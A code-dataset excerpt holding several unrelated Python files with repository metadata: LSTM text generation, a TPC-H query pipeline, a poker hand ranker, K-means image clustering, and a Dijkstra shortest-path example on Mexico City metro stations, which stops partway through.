| 2.456422
| 2
|
lstm.py
|
parismita/Text-Generation-by-LSTM
| 0
|
6628104
|
<reponame>parismita/Text-Generation-by-LSTM
import numpy,re,keras
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from keras.utils import np_utils
#load the text file
t= "humanAction.txt"
#t = "hello.txt"
text = open(t).read()
#to reduce the vocabulay lstm has to learn(only read lower case char)
text = text.lower()
text = text[:1136761/2]
#removing special charecters
pattern=re.compile("[^\w\n]")
text = pattern.sub(' ', text)
#mapping char to integers
chars = sorted(list(set(text)))
char_to_int = dict((c,i) for i,c in enumerate(chars))
int_to_char = dict((i, c) for i, c in enumerate(chars))
n_chars = len(text)
n_vocab = len(chars)
print n_chars , n_vocab
seq_length = 100
dataX = []
dataY = []
for i in range(0, n_chars - seq_length, 1):
seq_in = text[i:i + seq_length]
seq_out = text[i + seq_length]
dataX.append([char_to_int[char] for char in seq_in])
dataY.append(char_to_int[seq_out])
n_patterns = len(dataX)
#print "Total Patterns: ", n_patterns
#training data in format (sample, time step,features)
trainX = numpy.reshape(dataX, (n_patterns, seq_length, 1))
# normalize X
trainX = trainX / float(n_vocab)
trainY = np_utils.to_categorical(dataY)
#print trainY.shape,trainX.shape
import sys
# define the LSTM model
model = Sequential()
model.add(LSTM(512, input_shape=(trainX.shape[1], trainX.shape[2]),return_sequences=False))
model.add(Dropout(0.5))
model.add(Dense(trainY.shape[1], activation='softmax'))
model.load_weights("weights-improvement-17-1.2324.hdf5")
#adamax= keras.optimizers.Adamax(lr=0.005)
model.compile(loss='categorical_crossentropy', optimizer='adamax',metrics=['accuracy'])
filepath="weights-improvement-{epoch:02d}-{loss:.4f}.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=True, mode='min')
callbacks_list = [checkpoint]
model.summary()
model.fit(trainX, trainY, nb_epoch=20,validation_split=0.40, batch_size=100,callbacks=callbacks_list)
start = numpy.random.randint(0, len(dataX)-1)
pattern = dataX[start]
print "Seed:"
print "\"", ''.join([int_to_char[value] for value in pattern]), "\""
# generate characters
text_file = open("output1.txt", "a")
for i in range(1000):
x = numpy.reshape(pattern, (1, len(pattern), 1))
x = x / float(n_vocab)
prediction = model.predict(x, verbose=0)
index = numpy.argmax(prediction)
result = int_to_char[index]
seq_in = [int_to_char[value] for value in pattern]
sys.stdout.write(result)
text_file.write(result)
pattern.append(index)
pattern = pattern[1:len(pattern)]
print "\nDone."
|
import numpy,re,keras
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from keras.utils import np_utils
#load the text file
t= "humanAction.txt"
#t = "hello.txt"
text = open(t).read()
#to reduce the vocabulay lstm has to learn(only read lower case char)
text = text.lower()
text = text[:1136761/2]
#removing special charecters
pattern=re.compile("[^\w\n]")
text = pattern.sub(' ', text)
#mapping char to integers
chars = sorted(list(set(text)))
char_to_int = dict((c,i) for i,c in enumerate(chars))
int_to_char = dict((i, c) for i, c in enumerate(chars))
n_chars = len(text)
n_vocab = len(chars)
print n_chars , n_vocab
seq_length = 100
dataX = []
dataY = []
for i in range(0, n_chars - seq_length, 1):
seq_in = text[i:i + seq_length]
seq_out = text[i + seq_length]
dataX.append([char_to_int[char] for char in seq_in])
dataY.append(char_to_int[seq_out])
n_patterns = len(dataX)
#print "Total Patterns: ", n_patterns
#training data in format (sample, time step,features)
trainX = numpy.reshape(dataX, (n_patterns, seq_length, 1))
# normalize X
trainX = trainX / float(n_vocab)
trainY = np_utils.to_categorical(dataY)
#print trainY.shape,trainX.shape
import sys
# define the LSTM model
model = Sequential()
model.add(LSTM(512, input_shape=(trainX.shape[1], trainX.shape[2]),return_sequences=False))
model.add(Dropout(0.5))
model.add(Dense(trainY.shape[1], activation='softmax'))
model.load_weights("weights-improvement-17-1.2324.hdf5")
#adamax= keras.optimizers.Adamax(lr=0.005)
model.compile(loss='categorical_crossentropy', optimizer='adamax',metrics=['accuracy'])
filepath="weights-improvement-{epoch:02d}-{loss:.4f}.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=True, mode='min')
callbacks_list = [checkpoint]
model.summary()
model.fit(trainX, trainY, nb_epoch=20,validation_split=0.40, batch_size=100,callbacks=callbacks_list)
start = numpy.random.randint(0, len(dataX)-1)
pattern = dataX[start]
print "Seed:"
print "\"", ''.join([int_to_char[value] for value in pattern]), "\""
# generate characters
text_file = open("output1.txt", "a")
for i in range(1000):
x = numpy.reshape(pattern, (1, len(pattern), 1))
x = x / float(n_vocab)
prediction = model.predict(x, verbose=0)
index = numpy.argmax(prediction)
result = int_to_char[index]
seq_in = [int_to_char[value] for value in pattern]
sys.stdout.write(result)
text_file.write(result)
pattern.append(index)
pattern = pattern[1:len(pattern)]
print "\nDone."
|
en
| 0.717514
|
#load the text file #t = "hello.txt" #to reduce the vocabulay lstm has to learn(only read lower case char) #removing special charecters #mapping char to integers #print "Total Patterns: ", n_patterns #training data in format (sample, time step,features) # normalize X #print trainY.shape,trainX.shape # define the LSTM model #adamax= keras.optimizers.Adamax(lr=0.005) # generate characters
| 2.9697
| 3
|
src/python-for-android/recipes/eth-account/__init__.py
|
homdx/EtherollApp
| 0
|
6628105
|
<filename>src/python-for-android/recipes/eth-account/__init__.py<gh_stars>0
from pythonforandroid.recipe import PythonRecipe
class EthRlpRecipe(PythonRecipe):
version = '0.2.2'
url = 'https://github.com/ethereum/eth-account/archive/v{version}.tar.gz'
depends = [('python2', 'python3crystax'), 'setuptools']
patches = ['disable-setuptools-markdown.patch']
recipe = EthRlpRecipe()
|
<filename>src/python-for-android/recipes/eth-account/__init__.py<gh_stars>0
from pythonforandroid.recipe import PythonRecipe
class EthRlpRecipe(PythonRecipe):
version = '0.2.2'
url = 'https://github.com/ethereum/eth-account/archive/v{version}.tar.gz'
depends = [('python2', 'python3crystax'), 'setuptools']
patches = ['disable-setuptools-markdown.patch']
recipe = EthRlpRecipe()
|
none
| 1
| 1.77275
| 2
|
|
apps/tpch-12.py
|
A-JM/quokka
| 0
|
6628106
|
<filename>apps/tpch-12.py
import sys
sys.path.append("/home/ubuntu/quokka/")
import datetime
import time
from quokka_runtime import TaskGraph
from sql import AggExecutor, JoinExecutor
import pandas as pd
import ray
import os
task_graph = TaskGraph()
def batch_func(results):
aggs = []
for df in results:
df["high"] = ((df["o_orderpriority"] == "1-URGENT") | (df["o_orderpriority"] == "2-HIGH")).astype(int)
df["low"] = ((df["o_orderpriority"] != "1-URGENT") & (df["o_orderpriority"] != "2-HIGH")).astype(int)
aggs.append(df.groupby("l_shipmode").agg({'high':['sum'],'low':['sum']}))
for i in range(1,len(aggs)):
aggs[0] = aggs[0].add(aggs[i],fill_value=0)
return [aggs[0]]
lineitem_scheme = ["l_orderkey","l_partkey","l_suppkey","l_linenumber","l_quantity","l_extendedprice",
"l_discount","l_tax","l_returnflag","l_linestatus","l_shipdate","l_commitdate","l_receiptdate","l_shipinstruct",
"l_shipmode","l_comment", "null"]
order_scheme = ["o_orderkey", "o_custkey","o_orderstatus","o_totalprice","o_orderdate","o_orderpriority","o_clerk",
"o_shippriority","o_comment", "null"]
orders_filter = lambda x: x[["o_orderkey","o_orderpriority"]]
lineitem_filter = lambda x: x[((x.l_shipmode == "MAIL") | (x.l_shipmode == "SHIP")) & (x.l_commitdate < x.l_receiptdate)
& (x.l_shipdate < x.l_commitdate) & (x.l_receiptdate >= pd.to_datetime(datetime.date(1994,1,1))) & (x.l_receiptdate < pd.to_datetime(datetime.date(1995,1,1)))][["l_orderkey","l_shipmode"]]
if sys.argv[1] == "small":
print("DOING SMALL")
orders = task_graph.new_input_csv("tpc-h-small","orders.tbl",order_scheme,{'localhost':8, '172.31.16.185':8},batch_func=orders_filter, sep="|")
lineitem = task_graph.new_input_csv("tpc-h-small","lineitem.tbl",lineitem_scheme,{'localhost':8, '172.31.16.185':8},batch_func=lineitem_filter, sep="|")
else:
orders = task_graph.new_input_csv("tpc-h-csv","orders/orders.tbl.1",order_scheme,{'localhost':8, '172.31.16.185':8},batch_func=orders_filter, sep="|")
lineitem = task_graph.new_input_csv("tpc-h-csv","lineitem/lineitem.tbl.1",lineitem_scheme,{'localhost':8, '172.31.16.185':8},batch_func=lineitem_filter, sep="|")
join_executor = JoinExecutor(left_on="o_orderkey",right_on="l_orderkey", batch_func=batch_func, left_primary = True)
output_stream = task_graph.new_non_blocking_node({0:orders,1:lineitem},join_executor,{'localhost':2, '172.31.16.185':2}, {0:"o_orderkey", 1:"l_orderkey"})
agg_executor = AggExecutor()
agged = task_graph.new_blocking_node({0:output_stream}, None, agg_executor, {'localhost':1}, {0:None})
task_graph.initialize()
start = time.time()
task_graph.run()
print("total time ", time.time() - start)
print(agged.to_pandas.remote())
#import pdb;pdb.set_trace()
|
<filename>apps/tpch-12.py
import sys
sys.path.append("/home/ubuntu/quokka/")
import datetime
import time
from quokka_runtime import TaskGraph
from sql import AggExecutor, JoinExecutor
import pandas as pd
import ray
import os
task_graph = TaskGraph()
def batch_func(results):
aggs = []
for df in results:
df["high"] = ((df["o_orderpriority"] == "1-URGENT") | (df["o_orderpriority"] == "2-HIGH")).astype(int)
df["low"] = ((df["o_orderpriority"] != "1-URGENT") & (df["o_orderpriority"] != "2-HIGH")).astype(int)
aggs.append(df.groupby("l_shipmode").agg({'high':['sum'],'low':['sum']}))
for i in range(1,len(aggs)):
aggs[0] = aggs[0].add(aggs[i],fill_value=0)
return [aggs[0]]
lineitem_scheme = ["l_orderkey","l_partkey","l_suppkey","l_linenumber","l_quantity","l_extendedprice",
"l_discount","l_tax","l_returnflag","l_linestatus","l_shipdate","l_commitdate","l_receiptdate","l_shipinstruct",
"l_shipmode","l_comment", "null"]
order_scheme = ["o_orderkey", "o_custkey","o_orderstatus","o_totalprice","o_orderdate","o_orderpriority","o_clerk",
"o_shippriority","o_comment", "null"]
orders_filter = lambda x: x[["o_orderkey","o_orderpriority"]]
lineitem_filter = lambda x: x[((x.l_shipmode == "MAIL") | (x.l_shipmode == "SHIP")) & (x.l_commitdate < x.l_receiptdate)
& (x.l_shipdate < x.l_commitdate) & (x.l_receiptdate >= pd.to_datetime(datetime.date(1994,1,1))) & (x.l_receiptdate < pd.to_datetime(datetime.date(1995,1,1)))][["l_orderkey","l_shipmode"]]
if sys.argv[1] == "small":
print("DOING SMALL")
orders = task_graph.new_input_csv("tpc-h-small","orders.tbl",order_scheme,{'localhost':8, '172.31.16.185':8},batch_func=orders_filter, sep="|")
lineitem = task_graph.new_input_csv("tpc-h-small","lineitem.tbl",lineitem_scheme,{'localhost':8, '172.31.16.185':8},batch_func=lineitem_filter, sep="|")
else:
orders = task_graph.new_input_csv("tpc-h-csv","orders/orders.tbl.1",order_scheme,{'localhost':8, '172.31.16.185':8},batch_func=orders_filter, sep="|")
lineitem = task_graph.new_input_csv("tpc-h-csv","lineitem/lineitem.tbl.1",lineitem_scheme,{'localhost':8, '172.31.16.185':8},batch_func=lineitem_filter, sep="|")
join_executor = JoinExecutor(left_on="o_orderkey",right_on="l_orderkey", batch_func=batch_func, left_primary = True)
output_stream = task_graph.new_non_blocking_node({0:orders,1:lineitem},join_executor,{'localhost':2, '172.31.16.185':2}, {0:"o_orderkey", 1:"l_orderkey"})
agg_executor = AggExecutor()
agged = task_graph.new_blocking_node({0:output_stream}, None, agg_executor, {'localhost':1}, {0:None})
task_graph.initialize()
start = time.time()
task_graph.run()
print("total time ", time.time() - start)
print(agged.to_pandas.remote())
#import pdb;pdb.set_trace()
|
en
| 0.265379
|
#import pdb;pdb.set_trace()
| 2.399288
| 2
|
checkio/Shelter/Texas Referee/texas_referee.py
|
KenMercusLai/checkio
| 39
|
6628107
|
RANKS = "23456789TJQKA"
SUITS = "scdh"
from itertools import combinations
def straight_flush(cards_list):
s = straight(cards_list)
f = flush(cards_list)
if s and f:
for i in s:
if i in f:
return [i]
def same_rank(cards_list, num):
result = []
for i in combinations(cards_list, num):
if len(set([j[0] for j in i])) == 1:
result.append(i)
return result
def four_of_kind(cards_list):
four = same_rank(cards_list, 4)
for i in four:
sub_cards_list = [j for j in cards_list if j not in i]
return [(list(i) + [sub_cards_list[0]])]
def full_house(cards_list):
three = same_rank(cards_list, 3)
for i in three:
sub_cards_list = [j for j in cards_list if j not in i]
pairs = same_rank(sub_cards_list, 2)
if pairs:
return [(list(i) + list(pairs[0]))]
def flush(cards_list):
result = []
for i in combinations(cards_list, 5):
if len(set([j[1] for j in i])) == 1:
result.append(i)
return result
def straight(cards_list):
result = []
for i in combinations(cards_list, 5):
rank = list(map(lambda x: x[0], i))
if rank[0] - rank[-1] == 4 and len(set(rank)) == 5:
result.append(i)
return result
def three_of_a_kind(cards_list):
four = same_rank(cards_list, 3)
for i in four:
sub_cards_list = [j for j in cards_list if j not in i]
return [(list(i) + sub_cards_list[:2])]
def two_pair(cards_list):
pairs = same_rank(cards_list, 2)
if len(pairs) >= 2:
two = tuple(list(pairs[0]) + list(pairs[1]))
sub_cards_list = [j for j in cards_list if j not in two]
return [sorted(list(two) + [sub_cards_list[0]], reverse=True)]
def one_pair(cards_list):
pairs = same_rank(cards_list, 2)
if len(pairs) == 1:
two = tuple(list(pairs[0]))
sub_cards_list = [j for j in cards_list if j not in two]
return [sorted(list(two) + sub_cards_list[:3], reverse=True)]
def high_card(cards_list):
return [(cards_list[:5])]
def texas_referee(cards_str):
cards_list = sorted(
[(RANKS.index(i[0]) + 2, SUITS.index(i[1])) for i in cards_str.split(',')],
reverse=True,
)
hand_list = (
straight_flush,
four_of_kind,
full_house,
flush,
straight,
three_of_a_kind,
two_pair,
one_pair,
high_card,
)
for fun in hand_list:
cards = fun(cards_list)
if cards:
cards = [str(RANKS[i[0] - 2]) + str(SUITS[i[1]]) for i in cards[0]]
return ','.join(cards)
if __name__ == '__main__': # pragma: no cover
# These "asserts" using only for self-checking and not necessary for
# auto-testing
assert (
texas_referee("Kh,Qh,Ah,9s,2c,Th,Jh") == "Ah,Kh,Qh,Jh,Th"
), "High Straight Flush"
assert texas_referee("Qd,Ad,9d,8d,Td,Jd,7d") == "Qd,Jd,Td,9d,8d", "Straight Flush"
assert texas_referee("5c,7h,7d,9s,9c,8h,6d") == "9c,8h,7h,6d,5c", "Straight"
assert texas_referee("Ts,2h,2d,3s,Td,3c,Th") == "Th,Td,Ts,3c,3s", "Full House"
assert (
texas_referee("Jh,Js,9h,Jd,Th,8h,Td") == "Jh,Jd,Js,Th,Td"
), "Full House vs Flush"
assert texas_referee("Js,Td,8d,9s,7d,2d,4d") == "Td,8d,7d,4d,2d", "Flush"
assert texas_referee("Ts,2h,Tc,3s,Td,3c,Th") == "Th,Td,Tc,Ts,3c", "Four of Kind"
assert texas_referee("Ks,9h,Th,Jh,Kd,Kh,8s") == "Kh,Kd,Ks,Jh,Th", "Three of Kind"
assert texas_referee("2c,3s,4s,5s,7s,2d,7h") == "7h,7s,5s,2d,2c", "Two Pairs"
assert texas_referee("2s,3s,4s,5s,2d,7h,8h") == "8h,7h,5s,2d,2s", "One Pair"
assert texas_referee("3h,4h,Th,6s,Ad,Jc,2h") == "Ad,Jc,Th,6s,4h", "High Cards"
|
RANKS = "23456789TJQKA"
SUITS = "scdh"
from itertools import combinations
def straight_flush(cards_list):
s = straight(cards_list)
f = flush(cards_list)
if s and f:
for i in s:
if i in f:
return [i]
def same_rank(cards_list, num):
result = []
for i in combinations(cards_list, num):
if len(set([j[0] for j in i])) == 1:
result.append(i)
return result
def four_of_kind(cards_list):
four = same_rank(cards_list, 4)
for i in four:
sub_cards_list = [j for j in cards_list if j not in i]
return [(list(i) + [sub_cards_list[0]])]
def full_house(cards_list):
three = same_rank(cards_list, 3)
for i in three:
sub_cards_list = [j for j in cards_list if j not in i]
pairs = same_rank(sub_cards_list, 2)
if pairs:
return [(list(i) + list(pairs[0]))]
def flush(cards_list):
result = []
for i in combinations(cards_list, 5):
if len(set([j[1] for j in i])) == 1:
result.append(i)
return result
def straight(cards_list):
result = []
for i in combinations(cards_list, 5):
rank = list(map(lambda x: x[0], i))
if rank[0] - rank[-1] == 4 and len(set(rank)) == 5:
result.append(i)
return result
def three_of_a_kind(cards_list):
four = same_rank(cards_list, 3)
for i in four:
sub_cards_list = [j for j in cards_list if j not in i]
return [(list(i) + sub_cards_list[:2])]
def two_pair(cards_list):
pairs = same_rank(cards_list, 2)
if len(pairs) >= 2:
two = tuple(list(pairs[0]) + list(pairs[1]))
sub_cards_list = [j for j in cards_list if j not in two]
return [sorted(list(two) + [sub_cards_list[0]], reverse=True)]
def one_pair(cards_list):
pairs = same_rank(cards_list, 2)
if len(pairs) == 1:
two = tuple(list(pairs[0]))
sub_cards_list = [j for j in cards_list if j not in two]
return [sorted(list(two) + sub_cards_list[:3], reverse=True)]
def high_card(cards_list):
return [(cards_list[:5])]
def texas_referee(cards_str):
cards_list = sorted(
[(RANKS.index(i[0]) + 2, SUITS.index(i[1])) for i in cards_str.split(',')],
reverse=True,
)
hand_list = (
straight_flush,
four_of_kind,
full_house,
flush,
straight,
three_of_a_kind,
two_pair,
one_pair,
high_card,
)
for fun in hand_list:
cards = fun(cards_list)
if cards:
cards = [str(RANKS[i[0] - 2]) + str(SUITS[i[1]]) for i in cards[0]]
return ','.join(cards)
if __name__ == '__main__': # pragma: no cover
# These "asserts" using only for self-checking and not necessary for
# auto-testing
assert (
texas_referee("Kh,Qh,Ah,9s,2c,Th,Jh") == "Ah,Kh,Qh,Jh,Th"
), "High Straight Flush"
assert texas_referee("Qd,Ad,9d,8d,Td,Jd,7d") == "Qd,Jd,Td,9d,8d", "Straight Flush"
assert texas_referee("5c,7h,7d,9s,9c,8h,6d") == "9c,8h,7h,6d,5c", "Straight"
assert texas_referee("Ts,2h,2d,3s,Td,3c,Th") == "Th,Td,Ts,3c,3s", "Full House"
assert (
texas_referee("Jh,Js,9h,Jd,Th,8h,Td") == "Jh,Jd,Js,Th,Td"
), "Full House vs Flush"
assert texas_referee("Js,Td,8d,9s,7d,2d,4d") == "Td,8d,7d,4d,2d", "Flush"
assert texas_referee("Ts,2h,Tc,3s,Td,3c,Th") == "Th,Td,Tc,Ts,3c", "Four of Kind"
assert texas_referee("Ks,9h,Th,Jh,Kd,Kh,8s") == "Kh,Kd,Ks,Jh,Th", "Three of Kind"
assert texas_referee("2c,3s,4s,5s,7s,2d,7h") == "7h,7s,5s,2d,2c", "Two Pairs"
assert texas_referee("2s,3s,4s,5s,2d,7h,8h") == "8h,7h,5s,2d,2s", "One Pair"
assert texas_referee("3h,4h,Th,6s,Ad,Jc,2h") == "Ad,Jc,Th,6s,4h", "High Cards"
|
en
| 0.745408
|
# pragma: no cover # These "asserts" using only for self-checking and not necessary for # auto-testing
| 2.925571
| 3
|
src/test2/task2.py
|
samorojy/spbu_python_course
| 0
|
6628108
|
<reponame>samorojy/spbu_python_course
import random
import numpy
import numpy as np
from PIL import Image
from numpy.random import uniform
# function is defined in SciPy?
def euclidean(point, data):
return np.sqrt(np.sum((point - data) ** 2, axis=1))
class KMeans:
def __init__(self, n_clusters=2, max_iter=100):
self.n_clusters = n_clusters
self.max_iter = max_iter
def fit(self, X):
self.centroids = [random.choice(X)]
for _ in range(self.n_clusters - 1):
dists = np.sum([euclidean(centroid, X) for centroid in self.centroids], axis=0)
dists /= np.sum(dists)
(new_centroid_idx,) = np.random.choice(range(len(X)), size=1, p=dists)
self.centroids += [X[new_centroid_idx]]
iteration = 0
prev_centroids = None
while np.not_equal(self.centroids, prev_centroids).any() and iteration < self.max_iter:
sorted_points = [[] for _ in range(self.n_clusters)]
for point in X:
dists = euclidean(point, self.centroids)
centroid_idx = np.argmin(dists)
sorted_points[centroid_idx].append(point)
prev_centroids = self.centroids
self.centroids = [np.mean(cluster, axis=0) for cluster in sorted_points]
for i, centroid in enumerate(self.centroids):
if np.isnan(centroid).any():
self.centroids[i] = prev_centroids[i]
iteration += 1
def predict(self, X):
centroids = []
centroid_idxs = []
for x in X:
dists = euclidean(x, self.centroids)
centroid_idx = np.argmin(dists)
centroids.append(self.centroids[centroid_idx])
centroid_idxs.append(centroid_idx)
return np.array([i for i in centroid_idxs])
with Image.open("img.png") as img:
width, height = img.size
pixels = np.array([(i % width, i // width) + c for i, c in enumerate(list(img.getdata()))])
model = KMeans(30, 100)
model.fit(pixels)
prediction = model.predict(pixels)
image_pixels = img.load()
for i in range(len(pixels)):
image_pixels[pixels[i][0], pixels[i][1]] = tuple(int(x) for x in model.centroids[prediction[i]][2:])
img.save("processed.png")
|
import random
import numpy
import numpy as np
from PIL import Image
from numpy.random import uniform
# function is defined in SciPy?
def euclidean(point, data):
return np.sqrt(np.sum((point - data) ** 2, axis=1))
class KMeans:
def __init__(self, n_clusters=2, max_iter=100):
self.n_clusters = n_clusters
self.max_iter = max_iter
def fit(self, X):
self.centroids = [random.choice(X)]
for _ in range(self.n_clusters - 1):
dists = np.sum([euclidean(centroid, X) for centroid in self.centroids], axis=0)
dists /= np.sum(dists)
(new_centroid_idx,) = np.random.choice(range(len(X)), size=1, p=dists)
self.centroids += [X[new_centroid_idx]]
iteration = 0
prev_centroids = None
while np.not_equal(self.centroids, prev_centroids).any() and iteration < self.max_iter:
sorted_points = [[] for _ in range(self.n_clusters)]
for point in X:
dists = euclidean(point, self.centroids)
centroid_idx = np.argmin(dists)
sorted_points[centroid_idx].append(point)
prev_centroids = self.centroids
self.centroids = [np.mean(cluster, axis=0) for cluster in sorted_points]
for i, centroid in enumerate(self.centroids):
if np.isnan(centroid).any():
self.centroids[i] = prev_centroids[i]
iteration += 1
def predict(self, X):
centroids = []
centroid_idxs = []
for x in X:
dists = euclidean(x, self.centroids)
centroid_idx = np.argmin(dists)
centroids.append(self.centroids[centroid_idx])
centroid_idxs.append(centroid_idx)
return np.array([i for i in centroid_idxs])
with Image.open("img.png") as img:
width, height = img.size
pixels = np.array([(i % width, i // width) + c for i, c in enumerate(list(img.getdata()))])
model = KMeans(30, 100)
model.fit(pixels)
prediction = model.predict(pixels)
image_pixels = img.load()
for i in range(len(pixels)):
image_pixels[pixels[i][0], pixels[i][1]] = tuple(int(x) for x in model.centroids[prediction[i]][2:])
img.save("processed.png")
|
en
| 0.861527
|
# function is defined in SciPy?
| 3.261024
| 3
|
alchemicalitp/tutorial_files.py
|
bigginlab/alchemicalitp
| 1
|
6628109
|
from pkg_resources import resource_filename
glu_top = resource_filename(__name__, 'data/fep_example/GLU.top')
glh_top = resource_filename(__name__, 'data/fep_example/GLH.top')
glu_crd = resource_filename(__name__, 'data/fep_example/GLU.gro')
glh_crd = resource_filename(__name__, 'data/fep_example/GLH.gro')
mdp_em0 = resource_filename(__name__, 'data/fep_example/minim0.mdp')
mdp_em1 = resource_filename(__name__, 'data/fep_example/minim1.mdp')
mdp_energy0 = resource_filename(__name__, 'data/fep_example/test0.mdp')
mdp_energy1 = resource_filename(__name__, 'data/fep_example/test1.mdp')
|
from pkg_resources import resource_filename
glu_top = resource_filename(__name__, 'data/fep_example/GLU.top')
glh_top = resource_filename(__name__, 'data/fep_example/GLH.top')
glu_crd = resource_filename(__name__, 'data/fep_example/GLU.gro')
glh_crd = resource_filename(__name__, 'data/fep_example/GLH.gro')
mdp_em0 = resource_filename(__name__, 'data/fep_example/minim0.mdp')
mdp_em1 = resource_filename(__name__, 'data/fep_example/minim1.mdp')
mdp_energy0 = resource_filename(__name__, 'data/fep_example/test0.mdp')
mdp_energy1 = resource_filename(__name__, 'data/fep_example/test1.mdp')
|
none
| 1
| 1.542878
| 2
|
|
problemsets/Codeforces/Python/A137.py
|
juarezpaulino/coderemite
| 0
|
6628110
|
<reponame>juarezpaulino/coderemite<gh_stars>0
"""
*
* Author: <NAME>(coderemite)
* Email: <EMAIL>
*
"""
a=input()
x=a[0]
r=j=0
for c in a:
if c!=x or j==5:
x=c;j=0;r+=1
j+=1
print(r+1)
|
"""
*
* Author: <NAME>(coderemite)
* Email: <EMAIL>
*
"""
a=input()
x=a[0]
r=j=0
for c in a:
if c!=x or j==5:
x=c;j=0;r+=1
j+=1
print(r+1)
|
en
| 0.307447
|
* * Author: <NAME>(coderemite) * Email: <EMAIL> *
| 3.325597
| 3
|
dijkstra.py
|
ivandumas/Algoritmos
| 0
|
6628111
|
<gh_stars>0
from queue import PriorityQueue
metro = ['El Rosario','Instituto del Petroleo','Deportivo 18 de Marzo','<NAME>','La Raza',
'Consulado','Tacuba','Oceania','Guerrero','Garibaldi','Hidalgo','<NAME>', 'Morelos',
'San Lazaro', 'Balderas','Salto del Agua','<NAME>','Candelaria','Tacubaya','Pantitlan',
'Centro Medico', 'Chabacano','Jamaica','Santa Anita','Mixcoac','Zapata','Ermita','Atlalinco']
class Graph:
def __init__(self, num_of_vertices):
self.v = num_of_vertices
self.edges = [[-1 for i in range(num_of_vertices)] for j in range(num_of_vertices)]
self.visited = []
def addEdge(self, u, v, weight):
self.edges[u][v] = weight
self.edges[v][u] = weight
def dijkstra(self, start_vertex):
D = {v:float('inf') for v in range(self.v)}
D[start_vertex] = 0
pq = PriorityQueue()
pq.put((0, start_vertex))
while not pq.empty():
(dist, current_vertex) = pq.get()
self.visited.append(current_vertex)
for neighbor in range(self.v):
if self.edges[current_vertex][neighbor] != -1:
distance = self.edges[current_vertex][neighbor]
if neighbor not in self.visited:
old_cost = D[neighbor]
new_cost = D[current_vertex] + distance
if new_cost < old_cost:
pq.put((new_cost, neighbor))
D[neighbor] = new_cost
return D
g = Graph(28)
g.addEdge(0, 1, 5)
g.addEdge(0, 6, 3)
g.addEdge(1, 2, 1)
g.addEdge(1, 4, 1)
g.addEdge(2, 3, 1)
g.addEdge(3, 5, 2)
g.addEdge(4, 2, 1)
g.addEdge(4, 5, 2)
g.addEdge(4, 8, 1)
g.addEdge(5, 7, 2)
g.addEdge(5, 12, 1)
g.addEdge(6, 10, 6)
g.addEdge(6, 18, 4)
g.addEdge(7, 13, 2)
g.addEdge(7, 19, 2)
g.addEdge(8, 9, 0)
g.addEdge(8, 10, 0)
g.addEdge(9, 11, 0)
g.addEdge(9, 12, 2)
g.addEdge(10, 11, 0)
g.addEdge(10, 14, 1)
g.addEdge(11, 15, 1)
g.addEdge(11, 16, 2)
g.addEdge(12, 13, 0)
g.addEdge(12, 17, 0)
g.addEdge(13, 17, 0)
g.addEdge(13, 19, 5)
g.addEdge(14, 18, 5)
g.addEdge(14, 15, 0)
g.addEdge(14, 20, 2)
g.addEdge(15, 16, 1)
g.addEdge(15, 21, 2)
g.addEdge(16, 17, 0)
g.addEdge(16, 21, 1)
g.addEdge(17, 22, 1)
g.addEdge(18, 20, 2)
g.addEdge(18, 24, 2)
g.addEdge(19, 22, 4)
g.addEdge(20, 21, 1)
g.addEdge(20, 25, 3)
g.addEdge(21, 22, 0)
g.addEdge(21, 23, 1)
g.addEdge(21, 26, 5)
g.addEdge(22, 23, 0)
g.addEdge(23, 27, 5)
g.addEdge(24, 25, 2)
g.addEdge(25, 26, 2)
g.addEdge(26, 27, 1)
print ("BFT:")
D = g.dijkstra(0)
for vertex in range(len(D)):
print(f"Distance from El Rosario to {metro[vertex]}, is {D[vertex]}")
|
from queue import PriorityQueue
metro = ['El Rosario','Instituto del Petroleo','Deportivo 18 de Marzo','<NAME>','La Raza',
'Consulado','Tacuba','Oceania','Guerrero','Garibaldi','Hidalgo','<NAME>', 'Morelos',
'San Lazaro', 'Balderas','Salto del Agua','<NAME>','Candelaria','Tacubaya','Pantitlan',
'Centro Medico', 'Chabacano','Jamaica','Santa Anita','Mixcoac','Zapata','Ermita','Atlalinco']
class Graph:
def __init__(self, num_of_vertices):
self.v = num_of_vertices
self.edges = [[-1 for i in range(num_of_vertices)] for j in range(num_of_vertices)]
self.visited = []
def addEdge(self, u, v, weight):
self.edges[u][v] = weight
self.edges[v][u] = weight
def dijkstra(self, start_vertex):
D = {v:float('inf') for v in range(self.v)}
D[start_vertex] = 0
pq = PriorityQueue()
pq.put((0, start_vertex))
while not pq.empty():
(dist, current_vertex) = pq.get()
self.visited.append(current_vertex)
for neighbor in range(self.v):
if self.edges[current_vertex][neighbor] != -1:
distance = self.edges[current_vertex][neighbor]
if neighbor not in self.visited:
old_cost = D[neighbor]
new_cost = D[current_vertex] + distance
if new_cost < old_cost:
pq.put((new_cost, neighbor))
D[neighbor] = new_cost
return D
g = Graph(28)
g.addEdge(0, 1, 5)
g.addEdge(0, 6, 3)
g.addEdge(1, 2, 1)
g.addEdge(1, 4, 1)
g.addEdge(2, 3, 1)
g.addEdge(3, 5, 2)
g.addEdge(4, 2, 1)
g.addEdge(4, 5, 2)
g.addEdge(4, 8, 1)
g.addEdge(5, 7, 2)
g.addEdge(5, 12, 1)
g.addEdge(6, 10, 6)
g.addEdge(6, 18, 4)
g.addEdge(7, 13, 2)
g.addEdge(7, 19, 2)
g.addEdge(8, 9, 0)
g.addEdge(8, 10, 0)
g.addEdge(9, 11, 0)
g.addEdge(9, 12, 2)
g.addEdge(10, 11, 0)
g.addEdge(10, 14, 1)
g.addEdge(11, 15, 1)
g.addEdge(11, 16, 2)
g.addEdge(12, 13, 0)
g.addEdge(12, 17, 0)
g.addEdge(13, 17, 0)
g.addEdge(13, 19, 5)
g.addEdge(14, 18, 5)
g.addEdge(14, 15, 0)
g.addEdge(14, 20, 2)
g.addEdge(15, 16, 1)
g.addEdge(15, 21, 2)
g.addEdge(16, 17, 0)
g.addEdge(16, 21, 1)
g.addEdge(17, 22, 1)
g.addEdge(18, 20, 2)
g.addEdge(18, 24, 2)
g.addEdge(19, 22, 4)
g.addEdge(20, 21, 1)
g.addEdge(20, 25, 3)
g.addEdge(21, 22, 0)
g.addEdge(21, 23, 1)
g.addEdge(21, 26, 5)
